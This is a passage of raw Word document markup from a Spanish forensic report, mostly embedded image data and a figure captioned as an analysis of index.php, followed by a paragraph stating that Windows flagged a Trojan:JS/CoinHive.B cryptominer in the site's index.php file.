eo&#10;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&#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YJVBYdgMAABMI&#10;AAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQAZl7a7f+YA&#10;AH/mAAAUAAAAAAAAAAAAAAAAANwFAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ1BLAQItABQABgAIAAAA&#10;IQCeuwaW4QAAAAoBAAAPAAAAAAAAAAAAAAAAAI3sAABkcnMvZG93bnJldi54bWxQSwECLQAUAAYA&#10;CAAAACEAqiYOvrwAAAAhAQAAGQAAAAAAAAAAAAAAAACb7QAAZHJzL19yZWxzL2Uyb0RvYy54bWwu&#10;cmVsc1BLBQYAAAAABgAGAHwBAACO7gAAAAA=&#10;">
                <v:shape id="Imagen 93" o:spid="_x0000_s1209" type="#_x0000_t75" style="position:absolute;width:53987;height:18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MUxwAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/da8Iw&#10;EH8X9j+EG+xNE1tx0hlFBoW9jOHHYI9Hc2urzSU0mdb/fhEEH+/3fcv1YDtxpj60jjVMJwoEceVM&#10;y7WGw74cL0CEiGywc0warhRgvXoaLbEw7sJbOu9iLVIIhwI1NDH6QspQNWQxTJwnTtyv6y3GdPa1&#10;ND1eUrjtZKbUXFpsOTU06Om9oeq0+7MaFvbqq+98+vO58V/Hupyp/FietH55HjZvICIN8SG+uz9M&#10;mp/l6nWeq1kGt58SAHL1DwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGCT4xTHAAAA4wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId231" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1210" type="#_x0000_t202" style="position:absolute;top:18288;width:5398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jCzyAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NasJA&#10;EL4LfYdlCr2UujFKKtFVrFrwYA9a8Txkp0lodjbsria+vVsoeJzvf+bL3jTiSs7XlhWMhgkI4sLq&#10;mksFp+/PtykIH5A1NpZJwY08LBdPgznm2nZ8oOsxlCKGsM9RQRVCm0vpi4oM+qFtiSP3Y53BEE9X&#10;Su2wi+GmkWmSZNJgzbGhwpbWFRW/x4tRkG3cpTvw+nVz2u7xqy3T88ftrNTLc7+agQjUh4f4373T&#10;cX46noyTLEvf4e+nCIBc3AEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBCXjCzyAAAAOMA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5CA50E75" w14:textId="37A12466" w:rsidR="001C78D9" w:rsidRPr="001C78D9" w:rsidRDefault="001C78D9" w:rsidP="001C78D9">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>55</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="139" w:name="_Toc155782622"/>
                        <w:r w:rsidRPr="006608F5">
                          <w:t>Análisis del código de index.php</w:t>
                        </w:r>
                        <w:r w:rsidRPr="001C78D9">
                          <w:t>.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="139"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Voy a buscar en la </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>página</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web cualquier anomalía que pueda tener. </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cuál</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es mi sorpresa que nada </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser descargada, Windows me da un aviso de una vulnerabilidad grave. detectando un troyano del tipo </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00B34E81">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Trojan:JS/CoinHive.B</w:t>
      </w:r>
      <w:r w:rsidR="009F0CF5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el archivo </w:t>
      </w:r>
      <w:r w:rsidR="009F0CF5" w:rsidRPr="009F0CF5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/html/index.php</w:t>
      </w:r>
      <w:r w:rsidR="009F0CF5" w:rsidRPr="009F0CF5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Este tipo de virus es un código en JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
